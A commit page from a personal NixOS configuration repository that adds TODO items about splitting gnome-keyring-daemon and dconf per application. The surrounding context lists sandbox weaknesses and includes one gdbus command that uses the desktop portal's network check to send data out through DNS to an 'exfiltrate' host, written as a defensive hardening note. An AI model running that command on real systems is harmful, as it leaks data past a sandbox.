colin/nix-files
1
0
Fork 1
Code Issues Pull Requests Projects Releases Wiki Activity

todo.md: cleanup gnome-keyring-daemon

Browse Source
This commit is contained in:
Colin
2024-10-27 10:05:51 +00:00
parent 6611f70274
commit ea334f7f77
1 changed files with 3 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
TODO.md
View File

@@ -75,6 +75,9 @@
- ~~for example anyone can `systemd-run --user ...` to potentially escape a sandbox~~
- for example, xdg-desktop-portal allows anyone to make arbitrary DNS requests
- e.g. `gdbus call --session --timeout 10 --dest org.freedesktop.portal.Desktop --object-path /org/freedesktop/portal/desktop --method org.freedesktop.portal.NetworkMonitor.CanReach 'data1.exfiltrate.uninsane.org' 80`
- make gnome-keyring-daemon less monolithic
- no reason every application with _a_ secret needs to see _all_ secrets
- check out oo7-daemon?
- make dconf stuff less monolithic
- i.e. per-app dconf profiles for those which need it. possible static config.
- flatpak/spectrum has some stuff to proxy dconf per-app